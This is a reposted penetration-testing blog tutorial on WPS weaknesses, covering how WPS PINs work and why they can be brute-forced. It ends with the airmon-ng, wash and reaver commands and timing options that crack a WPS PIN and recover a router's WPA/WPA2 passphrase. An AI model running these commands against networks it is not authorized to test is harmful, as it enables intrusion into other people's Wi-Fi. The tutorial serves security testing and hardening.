REAVER: Cracking WI-FI with WPS ENABLED – Penetration Testing

WPS is short for Wi-Fi Protected Setup and is a method of establishing a connection between a wireless device and a wireless router that was released in 2007. Typically to connect a wireless device to a router you need to know the router name (SSID) and its password. However, with WPS you could connect to the network using any of the methods below.

For devices that support WPS, you can enter the eight-digit WPS PIN on your wireless router to connect to the router.

If your wireless device has a WPS button of its own, you can press the WPS button on the router and then press the WPS button on your device to connect it to the network.

Press the WPS button on the router and then using a wireless device find and select the router to connect without having to enter a password.

For wireless devices that have WPS, you can enter the eight-digit generated PIN in your wireless router’s setup to connect the device.

Where is the WPS PIN or WPS Key?

The WPS PIN can be found on the back or bottom of the router. With most routers, the WPS PIN is on a sticker and is an eight-digit number.

Disadvantages with WPS

Although WPS can make it easier to connect wireless devices to your network, there are some distinct disadvantages of WPS.

If your wireless router is in an insecure area, anyone could press the WPS button on the back of the router and be able to connect to your network.

Because all WPS devices have a unique eight-digit PIN (technically seven since the last digit is a checksum), a hacker can use a brute-force attack on the router to identify the WPS PIN and then be able to connect to your network.

The WPS router PIN cannot be changed.

WPS only works with WPA or WPA2 security and does not support older devices with WEP.

Although WPS can make it easier to connect wireless devices to your network because of these disadvantages you may want to disable WPS through your router setup.

Reaver implements a brute force attack against WiFi Protected Setup which can crack the WPS pin of an access point in a matter of hours and subsequently recover the WPA/WPA2 passphrase. Specifically, Reaver targets the registrar functionality of WPS, which is flawed in that it only takes 11,000 attempts to guess the correct WPS pin in order to become a WPS registrar. Once registered as a registrar with the access point, the access point will give you the WPA passphrase.

Cracking WI-FI with WPS ENABLED

Start wireless card in monitor mode

airmon-ng start wlan0

See the list of networks that support the WPS.

wash -i wlan0mon

Using Reaver

reaver -i wlan0mon -vv -b XX:XX:XX:XX:XX:XX

Description

-i wlan0mon this interface.-b XX: XX: XX: XX: XX is BSSID attacked point.-vv -v, –verbose Display non-critical warnings

As there are additional useful options-t 2 – reduces response time (5 seconds by default) in this case to 2 seconds.-d 0 – the pause between attempts.

Key found

The post REAVER: Cracking WI-FI with WPS ENABLED appeared first on Penetration Testing.

Anúncios

Deixe um comentário

Preencha os seus dados abaixo ou clique em um ícone para log in:

Logotipo do WordPress.com

Você está comentando utilizando sua conta WordPress.com. Sair / Alterar )

Imagem do Twitter

Você está comentando utilizando sua conta Twitter. Sair / Alterar )

Foto do Facebook

Você está comentando utilizando sua conta Facebook. Sair / Alterar )

Foto do Google+

Você está comentando utilizando sua conta Google+. Sair / Alterar )

Conectando a %s